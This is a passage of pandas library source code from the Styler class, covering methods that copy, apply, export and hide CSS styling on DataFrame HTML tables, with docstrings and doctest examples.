- cell_context (cell css classes)
- ctx (cell css styles)
- caption
Non-data dependent attributes [copied and exported]:
- css
- hidden index state and hidden columns state (.hide_index_, .hide_columns_)
- table_attributes
- table_styles
- applied styles (_todo)
"""
# GH 40675
styler = Styler(
self.data, # populates attributes 'data', 'columns', 'index' as shallow
)
shallow = [ # simple string or boolean immutables
"hide_index_",
"hide_columns_",
"hide_column_names",
"hide_index_names",
"table_attributes",
"cell_ids",
"caption",
"uuid",
"uuid_len",
"template_latex", # also copy templates if these have been customised
"template_html_style",
"template_html_table",
"template_html",
]
deep = [ # nested lists or dicts
"css",
"_display_funcs",
"_display_funcs_index",
"_display_funcs_columns",
"hidden_rows",
"hidden_columns",
"ctx",
"ctx_index",
"ctx_columns",
"cell_context",
"_todo",
"table_styles",
"tooltips",
]
for attr in shallow:
setattr(styler, attr, getattr(self, attr))
for attr in deep:
val = getattr(self, attr)
setattr(styler, attr, copy.deepcopy(val) if deepcopy else val)
return styler
def __copy__(self) -> Styler:
return self._copy(deepcopy=False)
def __deepcopy__(self, memo) -> Styler:
return self._copy(deepcopy=True)
def clear(self) -> None:
"""
Reset the ``Styler``, removing any previously applied styles.
Returns None.
"""
# create default GH 40675
clean_copy = Styler(self.data, uuid=self.uuid)
clean_attrs = [a for a in clean_copy.__dict__ if not callable(a)]
self_attrs = [a for a in self.__dict__ if not callable(a)] # maybe more attrs
for attr in clean_attrs:
setattr(self, attr, getattr(clean_copy, attr))
for attr in set(self_attrs).difference(clean_attrs):
delattr(self, attr)
def _apply(
self,
func: Callable,
axis: Axis | None = 0,
subset: Subset | None = None,
**kwargs,
) -> Styler:
subset = slice(None) if subset is None else subset
subset = non_reducing_slice(subset)
data = self.data.loc[subset]
if axis is None:
result = func(data, **kwargs)
if not isinstance(result, DataFrame):
if not isinstance(result, np.ndarray):
raise TypeError(
f"Function {repr(func)} must return a DataFrame or ndarray "
f"when passed to `Styler.apply` with axis=None"
)
if not (data.shape == result.shape):
raise ValueError(
f"Function {repr(func)} returned ndarray with wrong shape.\n"
f"Result has shape: {result.shape}\n"
f"Expected shape: {data.shape}"
)
result = DataFrame(result, index=data.index, columns=data.columns)
else:
axis = self.data._get_axis_number(axis)
if axis == 0:
result = data.apply(func, axis=0, **kwargs)
else:
result = data.T.apply(func, axis=0, **kwargs).T # see GH 42005
if isinstance(result, Series):
raise ValueError(
f"Function {repr(func)} resulted in the apply method collapsing to a "
f"Series.\nUsually, this is the result of the function returning a "
f"single value, instead of list-like."
)
msg = (
f"Function {repr(func)} created invalid {{0}} labels.\nUsually, this is "
f"the result of the function returning a "
f"{'Series' if axis is not None else 'DataFrame'} which contains invalid "
f"labels, or returning an incorrectly shaped, list-like object which "
f"cannot be mapped to labels, possibly due to applying the function along "
f"the wrong axis.\n"
f"Result {{0}} has shape: {{1}}\n"
f"Expected {{0}} shape: {{2}}"
)
if not all(result.index.isin(data.index)):
raise ValueError(msg.format("index", result.index.shape, data.index.shape))
if not all(result.columns.isin(data.columns)):
raise ValueError(
msg.format("columns", result.columns.shape, data.columns.shape)
)
self._update_ctx(result)
return self
@Substitution(subset=subset)
def apply(
self,
func: Callable,
axis: Axis | None = 0,
subset: Subset | None = None,
**kwargs,
) -> Styler:
"""
Apply a CSS-styling function column-wise, row-wise, or table-wise.
Updates the HTML representation with the result.
Parameters
----------
func : function
``func`` should take a Series if ``axis`` in [0,1] and return a list-like
object of same length, or a Series, not necessarily of same length, with
valid index labels considering ``subset``.
``func`` should take a DataFrame if ``axis`` is ``None`` and return either
an ndarray with the same shape or a DataFrame, not necessarily of the same
shape, with valid index and columns labels considering ``subset``.
.. versionchanged:: 1.3.0
.. versionchanged:: 1.4.0
axis : {0 or 'index', 1 or 'columns', None}, default 0
Apply to each column (``axis=0`` or ``'index'``), to each row
(``axis=1`` or ``'columns'``), or to the entire DataFrame at once
with ``axis=None``.
%(subset)s
**kwargs : dict
Pass along to ``func``.
Returns
-------
self : Styler
See Also
--------
Styler.applymap_index: Apply a CSS-styling function to headers elementwise.
Styler.apply_index: Apply a CSS-styling function to headers level-wise.
Styler.applymap: Apply a CSS-styling function elementwise.
Notes
-----
The elements of the output of ``func`` should be CSS styles as strings, in the
format 'attribute: value; attribute2: value2; ...' or,
if nothing is to be applied to that element, an empty string or ``None``.
This is similar to ``DataFrame.apply``, except that ``axis=None``
applies the function to the entire DataFrame at once,
rather than column-wise or row-wise.
Examples
--------
>>> def highlight_max(x, color):
... return np.where(x == np.nanmax(x.to_numpy()), f"color: {color};", None)
>>> df = pd.DataFrame(np.random.randn(5, 2), columns=["A", "B"])
>>> df.style.apply(highlight_max, color='red') # doctest: +SKIP
>>> df.style.apply(highlight_max, color='blue', axis=1) # doctest: +SKIP
>>> df.style.apply(highlight_max, color='green', axis=None) # doctest: +SKIP
Using ``subset`` to restrict application to a single column or multiple columns
>>> df.style.apply(highlight_max, color='red', subset="A")
... # doctest: +SKIP
>>> df.style.apply(highlight_max, color='red', subset=["A", "B"])
... # doctest: +SKIP
Using a 2d input to ``subset`` to select rows in addition to columns
>>> df.style.apply(highlight_max, color='red', subset=([0,1,2], slice(None)))
... # doctest: +SKIP
>>> df.style.apply(highlight_max, color='red', subset=(slice(0,5,2), "A"))
... # doctest: +SKIP
Using a function which returns a Series / DataFrame of unequal length but
containing valid index labels
>>> df = pd.DataFrame([[1, 2], [3, 4], [4, 6]], index=["A1", "A2", "Total"])
>>> total_style = pd.Series("font-weight: bold;", index=["Total"])
>>> df.style.apply(lambda s: total_style) # doctest: +SKIP
See `Table Visualization <../../user_guide/style.ipynb>`_ user guide for
more details.
"""
self._todo.append(
(lambda instance: getattr(instance, "_apply"), (func, axis, subset), kwargs)
)
return self
def _apply_index(
self,
func: Callable,
axis: int | str = 0,
level: Level | list[Level] | None = None,
method: str = "apply",
**kwargs,
) -> Styler:
axis = self.data._get_axis_number(axis)
obj = self.index if axis == 0 else self.columns
levels_ = refactor_levels(level, obj)
data = DataFrame(obj.to_list()).loc[:, levels_]
if method == "apply":
result = data.apply(func, axis=0, **kwargs)
elif method == "applymap":
result = data.applymap(func, **kwargs)
self._update_ctx_header(result, axis)
return self
@doc(
this="apply",
wise="level-wise",
alt="applymap",
altwise="elementwise",
func="take a Series and return a string array of the same length",
axis='{0, 1, "index", "columns"}',
input_note="the index as a Series, if an Index, or a level of a MultiIndex",
output_note="an identically sized array of CSS styles as strings",
var="s",
ret='np.where(s == "B", "background-color: yellow;", "")',
ret2='["background-color: yellow;" if "x" in v else "" for v in s]',
)
def apply_index(
self,
func: Callable,
axis: int | str = 0,
level: Level | list[Level] | None = None,
**kwargs,
) -> Styler:
"""
Apply a CSS-styling function to the index or column headers, {wise}.
Updates the HTML representation with the result.
.. versionadded:: 1.4.0
Parameters
----------
func : function
``func`` should {func}.
axis : {axis}
The headers over which to apply the function.
level : int, str, list, optional
If index is MultiIndex the level(s) over which to apply the function.
**kwargs : dict
Pass along to ``func``.
Returns
-------
self : Styler
See Also
--------
Styler.{alt}_index: Apply a CSS-styling function to headers {altwise}.
Styler.apply: Apply a CSS-styling function column-wise, row-wise, or table-wise.
Styler.applymap: Apply a CSS-styling function elementwise.
Notes
-----
Each input to ``func`` will be {input_note}. The output of ``func`` should be
{output_note}, in the format 'attribute: value; attribute2: value2; ...'
or, if nothing is to be applied to that element, an empty string or ``None``.
Examples
--------
Basic usage to conditionally highlight values in the index.
>>> df = pd.DataFrame([[1,2], [3,4]], index=["A", "B"])
>>> def color_b(s):
... return {ret}
>>> df.style.{this}_index(color_b) # doctest: +SKIP
.. figure:: ../../_static/style/appmaphead1.png
Selectively applying to specific levels of MultiIndex columns.
>>> midx = pd.MultiIndex.from_product([['ix', 'jy'], [0, 1], ['x3', 'z4']])
>>> df = pd.DataFrame([np.arange(8)], columns=midx)
>>> def highlight_x({var}):
... return {ret2}
>>> df.style.{this}_index(highlight_x, axis="columns", level=[0, 2])
... # doctest: +SKIP
.. figure:: ../../_static/style/appmaphead2.png
"""
self._todo.append(
(
lambda instance: getattr(instance, "_apply_index"),
(func, axis, level, "apply"),
kwargs,
)
)
return self
@doc(
apply_index,
this="applymap",
wise="elementwise",
alt="apply",
altwise="level-wise",
func="take a scalar and return a string",
axis='{0, 1, "index", "columns"}',
input_note="an index value, if an Index, or a level value of a MultiIndex",
output_note="CSS styles as a string",
var="v",
ret='"background-color: yellow;" if v == "B" else None',
ret2='"background-color: yellow;" if "x" in v else None',
)
def applymap_index(
self,
func: Callable,
axis: int | str = 0,
level: Level | list[Level] | None = None,
**kwargs,
) -> Styler:
self._todo.append(
(
lambda instance: getattr(instance, "_apply_index"),
(func, axis, level, "applymap"),
kwargs,
)
)
return self
def _applymap(
self, func: Callable, subset: Subset | None = None, **kwargs
) -> Styler:
func = partial(func, **kwargs) # applymap doesn't take kwargs?
if subset is None:
subset = IndexSlice[:]
subset = non_reducing_slice(subset)
result = self.data.loc[subset].applymap(func)
self._update_ctx(result)
return self
@Substitution(subset=subset)
def applymap(
self, func: Callable, subset: Subset | None = None, **kwargs
) -> Styler:
"""
Apply a CSS-styling function elementwise.
Updates the HTML representation with the result.
Parameters
----------
func : function
``func`` should take a scalar and return a string.
%(subset)s
**kwargs : dict
Pass along to ``func``.
Returns
-------
self : Styler
See Also
--------
Styler.applymap_index: Apply a CSS-styling function to headers elementwise.
Styler.apply_index: Apply a CSS-styling function to headers level-wise.
Styler.apply: Apply a CSS-styling function column-wise, row-wise, or table-wise.
Notes
-----
The elements of the output of ``func`` should be CSS styles as strings, in the
format 'attribute: value; attribute2: value2; ...' or,
if nothing is to be applied to that element, an empty string or ``None``.
Examples
--------
>>> def color_negative(v, color):
... return f"color: {color};" if v < 0 else None
>>> df = pd.DataFrame(np.random.randn(5, 2), columns=["A", "B"])
>>> df.style.applymap(color_negative, color='red') # doctest: +SKIP
Using ``subset`` to restrict application to a single column or multiple columns
>>> df.style.applymap(color_negative, color='red', subset="A")
... # doctest: +SKIP
>>> df.style.applymap(color_negative, color='red', subset=["A", "B"])
... # doctest: +SKIP
Using a 2d input to ``subset`` to select rows in addition to columns
>>> df.style.applymap(color_negative, color='red',
... subset=([0,1,2], slice(None))) # doctest: +SKIP
>>> df.style.applymap(color_negative, color='red', subset=(slice(0,5,2), "A"))
... # doctest: +SKIP
See `Table Visualization <../../user_guide/style.ipynb>`_ user guide for
more details.
"""
self._todo.append(
(lambda instance: getattr(instance, "_applymap"), (func, subset), kwargs)
)
return self
@Substitution(subset=subset)
def where(
self,
cond: Callable,
value: str,
other: str | None = None,
subset: Subset | None = None,
**kwargs,
) -> Styler:
"""
Apply CSS-styles based on a conditional function elementwise.
.. deprecated:: 1.3.0
Updates the HTML representation with a style which is
selected in accordance with the return value of a function.
Parameters
----------
cond : callable
``cond`` should take a scalar, and optional keyword arguments, and return
a boolean.
value : str
Applied when ``cond`` returns true.
other : str
Applied when ``cond`` returns false.
%(subset)s
**kwargs : dict
Pass along to ``cond``.
Returns
-------
self : Styler
See Also
--------
Styler.applymap: Apply a CSS-styling function elementwise.
Styler.apply: Apply a CSS-styling function column-wise, row-wise, or table-wise.
Notes
-----
This method is deprecated.
This method is a convenience wrapper for :meth:`Styler.applymap`, which we
recommend using instead.
The example:
>>> df = pd.DataFrame([[1, 2], [3, 4]])
>>> def cond(v, limit=4):
... return v > 1 and v != limit
>>> df.style.where(cond, value='color:green;', other='color:red;')
... # doctest: +SKIP
should be refactored to:
>>> def style_func(v, value, other, limit=4):
... cond = v > 1 and v != limit
... return value if cond else other
>>> df.style.applymap(style_func, value='color:green;', other='color:red;')
... # doctest: +SKIP
"""
warnings.warn(
"this method is deprecated in favour of `Styler.applymap()`",
FutureWarning,
stacklevel=find_stack_level(),
)
if other is None:
other = ""
return self.applymap(
lambda val: value if cond(val, **kwargs) else other,
subset=subset,
)
def set_precision(self, precision: int) -> StylerRenderer:
"""
Set the precision used to display values.
.. deprecated:: 1.3.0
Parameters
----------
precision : int
Returns
-------
self : Styler
Notes
-----
This method is deprecated see `Styler.format`.
"""
warnings.warn(
"this method is deprecated in favour of `Styler.format(precision=..)`",
FutureWarning,
stacklevel=find_stack_level(),
)
self.precision = precision
return self.format(precision=precision, na_rep=self.na_rep)
def set_table_attributes(self, attributes: str) -> Styler:
"""
Set the table attributes added to the ``<table>`` HTML element.
These are items in addition to automatic (by default) ``id`` attribute.
Parameters
----------
attributes : str
Returns
-------
self : Styler
See Also
--------
Styler.set_table_styles: Set the table styles included within the ``<style>``
HTML element.
Styler.set_td_classes: Set the DataFrame of strings added to the ``class``
attribute of ``<td>`` HTML elements.
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 4))
>>> df.style.set_table_attributes('class="pure-table"') # doctest: +SKIP
# ... <table class="pure-table"> ...
"""
self.table_attributes = attributes
return self
def export(self) -> dict[str, Any]:
"""
Export the styles applied to the current Styler.
Can be applied to a second Styler with ``Styler.use``.
Returns
-------
styles : dict
See Also
--------
Styler.use: Set the styles on the current Styler.
Styler.copy: Create a copy of the current Styler.
Notes
-----
This method is designed to copy non-data dependent attributes of
one Styler to another. It differs from ``Styler.copy`` where data and
data dependent attributes are also copied.
The following items are exported since they are not generally data dependent:
- Styling functions added by the ``apply`` and ``applymap``
- Whether axes and names are hidden from the display, if unambiguous.
- Table attributes
- Table styles
The following attributes are considered data dependent and therefore not
exported:
- Caption
- UUID
- Tooltips
- Any hidden rows or columns identified by Index labels
- Any formatting applied using ``Styler.format``
- Any CSS classes added using ``Styler.set_td_classes``
Examples
--------
>>> styler = DataFrame([[1, 2], [3, 4]]).style
>>> styler2 = DataFrame([[9, 9, 9]]).style
>>> styler.hide_index().highlight_max(axis=1) # doctest: +SKIP
>>> export = styler.export()
>>> styler2.use(export) # doctest: +SKIP
"""
return {
"apply": copy.copy(self._todo),
"table_attributes": self.table_attributes,
"table_styles": copy.copy(self.table_styles),
"hide_index": all(self.hide_index_),
"hide_columns": all(self.hide_columns_),
"hide_index_names": self.hide_index_names,
"hide_column_names": self.hide_column_names,
"css": copy.copy(self.css),
}
def use(self, styles: dict[str, Any]) -> Styler:
"""
Set the styles on the current Styler.
Possibly uses styles from ``Styler.export``.
Parameters
----------
styles : dict(str, Any)
List of attributes to add to Styler. Dict keys should contain only:
- "apply": list of styler functions, typically added with ``apply`` or
``applymap``.
- "table_attributes": HTML attributes, typically added with
``set_table_attributes``.
- "table_styles": CSS selectors and properties, typically added with
``set_table_styles``.
- "hide_index": whether the index is hidden, typically added with
``hide_index``, or a boolean list for hidden levels.
- "hide_columns": whether column headers are hidden, typically added with
``hide_columns``, or a boolean list for hidden levels.
- "hide_index_names": whether index names are hidden.
- "hide_column_names": whether column header names are hidden.
- "css": the css class names used.
Returns
-------
self : Styler
See Also
--------
Styler.export : Export the non data dependent attributes to the current Styler.
Examples
--------
>>> styler = DataFrame([[1, 2], [3, 4]]).style
>>> styler2 = DataFrame([[9, 9, 9]]).style
>>> styler.hide_index().highlight_max(axis=1) # doctest: +SKIP
>>> export = styler.export()
>>> styler2.use(export) # doctest: +SKIP
"""
self._todo.extend(styles.get("apply", []))
table_attributes: str = self.table_attributes or ""
obj_table_atts: str = (
""
if styles.get("table_attributes") is None
else str(styles.get("table_attributes"))
)
self.set_table_attributes((table_attributes + " " + obj_table_atts).strip())
if styles.get("table_styles"):
self.set_table_styles(styles.get("table_styles"), overwrite=False)
for obj in ["index", "columns"]:
hide_obj = styles.get("hide_" + obj)
if hide_obj is not None:
if isinstance(hide_obj, bool):
n = getattr(self, obj).nlevels
setattr(self, "hide_" + obj + "_", [hide_obj] * n)
else:
setattr(self, "hide_" + obj + "_", hide_obj)
self.hide_index_names = styles.get("hide_index_names", False)
self.hide_column_names = styles.get("hide_column_names", False)
if styles.get("css"):
self.css = styles.get("css") # type: ignore[assignment]
return self
def set_uuid(self, uuid: str) -> Styler:
"""
Set the uuid applied to ``id`` attributes of HTML elements.
Parameters
----------
uuid : str
Returns
-------
self : Styler
Notes
-----
Almost all HTML elements within the table, and including the ``<table>`` element
are assigned ``id`` attributes. The format is ``T_uuid_<extra>`` where
``<extra>`` is typically a more specific identifier, such as ``row1_col2``.
"""
self.uuid = uuid
return self
def set_caption(self, caption: str | tuple) -> Styler:
"""
Set the text added to a ``<caption>`` HTML element.
Parameters
----------
caption : str, tuple
For HTML output either the string input is used or the first element of the
tuple. For LaTeX the string input provides a caption and the additional
tuple input allows for full captions and short captions, in that order.
Returns
-------
self : Styler
"""
msg = "`caption` must be either a string or 2-tuple of strings."
if isinstance(caption, tuple):
if (
len(caption) != 2
or not isinstance(caption[0], str)
or not isinstance(caption[1], str)
):
raise ValueError(msg)
elif not isinstance(caption, str):
raise ValueError(msg)
self.caption = caption
return self
def set_sticky(
self,
axis: Axis = 0,
pixel_size: int | None = None,
levels: Level | list[Level] | None = None,
) -> Styler:
"""
Add CSS to permanently display the index or column headers in a scrolling frame.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
Whether to make the index or column headers sticky.
pixel_size : int, optional
Required to configure the width of index cells or the height of column
header cells when sticking a MultiIndex (or with a named Index).
Defaults to 75 and 25 respectively.
levels : int, str, list, optional
If ``axis`` is a MultiIndex the specific levels to stick. If ``None`` will
stick all levels.
Returns
-------
self : Styler
Notes
-----
This method uses the CSS 'position: sticky;' property to display. It is
designed to work with visible axes, therefore both:
- `styler.set_sticky(axis="index").hide_index()`
- `styler.set_sticky(axis="columns").hide_columns()`
may produce strange behaviour due to CSS controls with missing elements.
"""
axis = self.data._get_axis_number(axis)
obj = self.data.index if axis == 0 else self.data.columns
pixel_size = (75 if axis == 0 else 25) if not pixel_size else pixel_size
props = "position:sticky; background-color:white;"
if not isinstance(obj, pd.MultiIndex):
# handling MultiIndexes requires different CSS
if axis == 1:
# stick the first <tr> of <head> and, if index names, the second <tr>
# if self._hide_columns then no <thead><tr> here will exist: no conflict
styles: CSSStyles = [
{
"selector": "thead tr:nth-child(1) th",
"props": props + "top:0px; z-index:2;",
}
]
if not self.index.names[0] is None:
styles[0]["props"] = (
props + f"top:0px; z-index:2; height:{pixel_size}px;"
)
styles.append(
{
"selector": "thead tr:nth-child(2) th",
"props": props
+ f"top:{pixel_size}px; z-index:2; height:{pixel_size}px; ",
}
)
else:
# stick the first <th> of each <tr> in both <thead> and <tbody>
# if self._hide_index then no <th> will exist in <tbody>: no conflict
# but <th> will exist in <thead>: conflict with initial element
styles = [
{
"selector": "thead tr th:nth-child(1)",
"props": props + "left:0px; z-index:3 !important;",
},
{
"selector": "tbody tr th:nth-child(1)",
"props": props + "left:0px; z-index:1;",
},
]
else:
# handle the MultiIndex case
range_idx = list(range(obj.nlevels))
levels_: list[int] = refactor_levels(levels, obj) if levels else range_idx
levels_ = sorted(levels_)
if axis == 1:
styles = []
for i, level in enumerate(levels_):
styles.append(
{
"selector": f"thead tr:nth-child({level+1}) th",
"props": props
+ (
f"top:{i * pixel_size}px; height:{pixel_size}px; "
"z-index:2;"
),
}
)
if not all(name is None for name in self.index.names):
styles.append(
{
"selector": f"thead tr:nth-child({obj.nlevels+1}) th",
"props": props
+ (
f"top:{(i+1) * pixel_size}px; height:{pixel_size}px; "
"z-index:2;"
),
}
)
else:
styles = []
for i, level in enumerate(levels_):
props_ = props + (
f"left:{i * pixel_size}px; "
f"min-width:{pixel_size}px; "
f"max-width:{pixel_size}px; "
)
styles.extend(
[
{
"selector": f"thead tr th:nth-child({level+1})",
"props": props_ + "z-index:3 !important;",
},
{
"selector": f"tbody tr th.level{level}",
"props": props_ + "z-index:1;",
},
]
)
return self.set_table_styles(styles, overwrite=False)
def set_table_styles(
self,
table_styles: dict[Any, CSSStyles] | CSSStyles | None = None,
axis: int = 0,
overwrite: bool = True,
css_class_names: dict[str, str] | None = None,
) -> Styler:
"""
Set the table styles included within the ``<style>`` HTML element.
This function can be used to style the entire table, columns, rows or
specific HTML selectors.
Parameters
----------
table_styles : list or dict
If supplying a list, each individual table_style should be a
dictionary with ``selector`` and ``props`` keys. ``selector``
should be a CSS selector that the style will be applied to
(automatically prefixed by the table's UUID) and ``props``
should be a list of tuples with ``(attribute, value)``.
If supplying a dict, the dict keys should correspond to
column names or index values, depending upon the specified
`axis` argument. These will be mapped to row or col CSS
selectors. MultiIndex values as dict keys should be
in their respective tuple form. The dict values should be
a list as specified in the form with CSS selectors and
props that will be applied to the specified row or column.
.. versionchanged:: 1.2.0
axis : {0 or 'index', 1 or 'columns', None}, default 0
Apply to each column (``axis=0`` or ``'index'``), to each row
(``axis=1`` or ``'columns'``). Only used if `table_styles` is
dict.
.. versionadded:: 1.2.0
overwrite : bool, default True
Styles are replaced if `True`, or extended if `False`. CSS
rules are preserved so most recent styles set will dominate
if selectors intersect.
.. versionadded:: 1.2.0
css_class_names : dict, optional
A dict of strings used to replace the default CSS classes described below.
.. versionadded:: 1.4.0
Returns
-------
self : Styler
See Also
--------
Styler.set_td_classes: Set the DataFrame of strings added to the ``class``
attribute of ``<td>`` HTML elements.
Styler.set_table_attributes: Set the table attributes added to the ``<table>``
HTML element.
Notes
-----
The default CSS classes dict, whose values can be replaced is as follows:
.. code-block:: python
css_class_names = {"row_heading": "row_heading",
"col_heading": "col_heading",
"index_name": "index_name",
"col": "col",
"col_trim": "col_trim",
"row_trim": "row_trim",
"level": "level",
"data": "data",
"blank": "blank}
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 4),
... columns=['A', 'B', 'C', 'D'])
>>> df.style.set_table_styles(
... [{'selector': 'tr:hover',
... 'props': [('background-color', 'yellow')]}]
... ) # doctest: +SKIP
Or with CSS strings
>>> df.style.set_table_styles(
... [{'selector': 'tr:hover',
... 'props': 'background-color: yellow; font-size: 1em;'}]
... ) # doctest: +SKIP
Adding column styling by name
>>> df.style.set_table_styles({
... 'A': [{'selector': '',
... 'props': [('color', 'red')]}],
... 'B': [{'selector': 'td',
... 'props': 'color: blue;'}]
... }, overwrite=False) # doctest: +SKIP
Adding row styling
>>> df.style.set_table_styles({
... 0: [{'selector': 'td:hover',
... 'props': [('font-size', '25px')]}]
... }, axis=1, overwrite=False) # doctest: +SKIP
See `Table Visualization <../../user_guide/style.ipynb>`_ user guide for
more details.
"""
if css_class_names is not None:
self.css = {**self.css, **css_class_names}
if table_styles is None:
return self
elif isinstance(table_styles, dict):
axis = self.data._get_axis_number(axis)
obj = self.data.index if axis == 1 else self.data.columns
idf = f".{self.css['row']}" if axis == 1 else f".{self.css['col']}"
table_styles = [
{
"selector": str(s["selector"]) + idf + str(idx),
"props": maybe_convert_css_to_tuples(s["props"]),
}
for key, styles in table_styles.items()
for idx in obj.get_indexer_for([key])
for s in format_table_styles(styles)
]
else:
table_styles = [
{
"selector": s["selector"],
"props": maybe_convert_css_to_tuples(s["props"]),
}
for s in table_styles
]
if not overwrite and self.table_styles is not None:
self.table_styles.extend(table_styles)
else:
self.table_styles = table_styles
return self
def set_na_rep(self, na_rep: str) -> StylerRenderer:
"""
Set the missing data representation on a ``Styler``.
.. versionadded:: 1.0.0
.. deprecated:: 1.3.0
Parameters
----------
na_rep : str
Returns
-------
self : Styler
Notes
-----
This method is deprecated. See `Styler.format()`
"""
warnings.warn(
"this method is deprecated in favour of `Styler.format(na_rep=..)`",
FutureWarning,
stacklevel=find_stack_level(),
)
self.na_rep = na_rep
return self.format(na_rep=na_rep, precision=self.precision)
def hide_index(
self,
subset: Subset | None = None,
level: Level | list[Level] | None = None,
names: bool = False,
) -> Styler:
"""
Hide the entire index, or specific keys in the index from rendering.
This method has dual functionality:
- if ``subset`` is ``None`` then the entire index, or specified levels, will
be hidden whilst displaying all data-rows.
- if a ``subset`` is given then those specific rows will be hidden whilst the
index itself remains visible.
.. versionchanged:: 1.3.0
.. deprecated:: 1.4.0
This method should be replaced by ``hide(axis="columns", **kwargs)``
Parameters
----------
subset : label, array-like, IndexSlice, optional
A valid 1d input or single key along the index axis within
`DataFrame.loc[<subset>, :]`, to limit ``data`` to *before* applying
the function.
level : int, str, list
The level(s) to hide in a MultiIndex if hiding the entire index. Cannot be
used simultaneously with ``subset``.
.. versionadded:: 1.4.0
names : bool
Whether to hide the index name(s), in the case the index or part of it
remains visible.
.. versionadded:: 1.4.0
Returns
-------
self : Styler
See Also
--------
Styler.hide: Hide the entire index / columns, or specific rows / columns.
"""
warnings.warn(
"this method is deprecated in favour of `Styler.hide(axis='index')`",
FutureWarning,
stacklevel=find_stack_level(),
)
return self.hide(axis=0, level=level, subset=subset, names=names)
def hide_columns(
self,
subset: Subset | None = None,
level: Level | list[Level] | None = None,
names: bool = False,
) -> Styler:
"""
Hide the column headers or specific keys in the columns from rendering.
This method has dual functionality:
- if ``subset`` is ``None`` then the entire column headers row, or
specific levels, will be hidden whilst the data-values remain visible.
- if a ``subset`` is given then those specific columns, including the
data-values will be hidden, whilst the column headers row remains visible.
.. versionchanged:: 1.3.0
..deprecated:: 1.4.0
This method should be replaced by ``hide(axis="columns", **kwargs)``
Parameters
----------
subset : label, array-like, IndexSlice, optional
A valid 1d input or single key along the columns axis within
`DataFrame.loc[:, <subset>]`, to limit ``data`` to *before* applying
the function.
level : int, str, list
The level(s) to hide in a MultiIndex if hiding the entire column headers
row. Cannot be used simultaneously with ``subset``.
.. versionadded:: 1.4.0
names : bool
Whether to hide the column index name(s), in the case all column headers,
or some levels, are visible.
.. versionadded:: 1.4.0
Returns
-------
self : Styler
See Also
--------
Styler.hide: Hide the entire index / columns, or specific rows / columns.
"""
warnings.warn(
"this method is deprecated in favour of `Styler.hide(axis='columns')`",
FutureWarning,
stacklevel=find_stack_level(),
)
return self.hide(axis=1, level=level, subset=subset, names=names)
def hide(
self,
subset: Subset | None = None,
axis: Axis = 0,
level: Level | list[Level] | None = None,
names: bool = False,
) -> Styler:
"""
Hide the entire index / column headers, or specific rows / columns from display.
.. versionadded:: 1.4.0
Parameters
----------
subset : label, array-like, IndexSlice, optional
A valid 1d input or single key along the axis within
`DataFrame.loc[<subset>, :]` or `DataFrame.loc[:, <subset>]` depending
upon ``axis``, to limit ``data`` to select hidden rows / columns.
axis : {"index", 0, "columns", 1}
Apply to the index or columns.
level : int, str, list
The level(s) to hide in a MultiIndex if hiding the entire index / column
headers. Cannot be used simultaneously with ``subset``.
names : bool
Whether to hide the level name(s) of the index / columns headers in the case
it (or at least one the levels) remains visible.
Returns
-------
self : Styler
Notes
-----
This method has multiple functionality depending upon the combination
of the ``subset``, ``level`` and ``names`` arguments (see examples). The
``axis`` argument is used only to control whether the method is applied to row
or column headers:
.. list-table:: Argument combinations
:widths: 10 20 10 60
:header-rows: 1
* - ``subset``
- ``level``
- ``names``
- Effect
* - None
- None
- False
- The axis-Index is hidden entirely.
* - None
- None
- True
- Only the axis-Index names are hidden.
* - None
- Int, Str, List
- False
- Specified axis-MultiIndex levels are hidden entirely.
* - None
- Int, Str, List
- True
- Specified axis-MultiIndex levels are hidden entirely and the names of
remaining axis-MultiIndex levels.
* - Subset
- None
- False
- The specified data rows/columns are hidden, but the axis-Index itself,
and names, remain unchanged.
* - Subset
- None
- True
- The specified data rows/columns and axis-Index names are hidden, but
the axis-Index itself remains unchanged.
* - Subset
- Int, Str, List
- Boolean
- ValueError: cannot supply ``subset`` and ``level`` simultaneously.
Note this method only hides the identifed elements so can be chained to hide
multiple elements in sequence.
Examples
--------
Simple application hiding specific rows:
>>> df = pd.DataFrame([[1,2], [3,4], [5,6]], index=["a", "b", "c"])
>>> df.style.hide(["a", "b"]) # doctest: +SKIP
0 1
c 5 6
Hide the index and retain the data values:
>>> midx = pd.MultiIndex.from_product([["x", "y"], ["a", "b", "c"]])
>>> df = pd.DataFrame(np.random.randn(6,6), index=midx, columns=midx)
>>> df.style.format("{:.1f}").hide() # doctest: +SKIP
x y
a b c a b c
0.1 0.0 0.4 1.3 0.6 -1.4
0.7 1.0 1.3 1.5 -0.0 -0.2
1.4 -0.8 1.6 -0.2 -0.4 -0.3
0.4 1.0 -0.2 -0.8 -1.2 1.1
-0.6 1.2 1.8 1.9 0.3 0.3
0.8 0.5 -0.3 1.2 2.2 -0.8
Hide specific rows in a MultiIndex but retain the index:
>>> df.style.format("{:.1f}").hide(subset=(slice(None), ["a", "c"]))
... # doctest: +SKIP
x y
a b c a b c
x b 0.7 1.0 1.3 1.5 -0.0 -0.2
y b -0.6 1.2 1.8 1.9 0.3 0.3
Hide specific rows and the index through chaining:
>>> df.style.format("{:.1f}").hide(subset=(slice(None), ["a", "c"])).hide()
... # doctest: +SKIP
x y
a b c a b c
0.7 1.0 1.3 1.5 -0.0 -0.2
-0.6 1.2 1.8 1.9 0.3 0.3
Hide a specific level:
>>> df.style.format("{:,.1f}").hide(level=1) # doctest: +SKIP
x y
a b c a b c
x 0.1 0.0 0.4 1.3 0.6 -1.4
0.7 1.0 1.3 1.5 -0.0 -0.2
1.4 -0.8 1.6 -0.2 -0.4 -0.3
y 0.4 1.0 -0.2 -0.8 -1.2 1.1
-0.6 1.2 1.8 1.9 0.3 0.3
0.8 0.5 -0.3 1.2 2.2 -0.8
Hiding just the index level names:
>>> df.index.names = ["lev0", "lev1"]
>>> df.style.format("{:,.1f}").hide(names=True) # doctest: +SKIP
x y
a b c a b c
x a 0.1 0.0 0.4 1.3 0.6 -1.4
b 0.7 1.0 1.3 1.5 -0.0 -0.2
c 1.4 -0.8 1.6 -0.2 -0.4 -0.3
y a 0.4 1.0 -0.2 -0.8 -1.2 1.1
b -0.6 1.2 1.8 1.9 0.3 0.3
c 0.8 0.5 -0.3 1.2 2.2 -0.8
Examples all produce equivalently transposed effects with ``axis="columns"``.
"""
axis = self.data._get_axis_number(axis)
if axis == 0:
obj, objs, alt = "index", "index", "rows"
else:
obj, objs, alt = "column", "columns", "columns"
if level is not None and subset is not None:
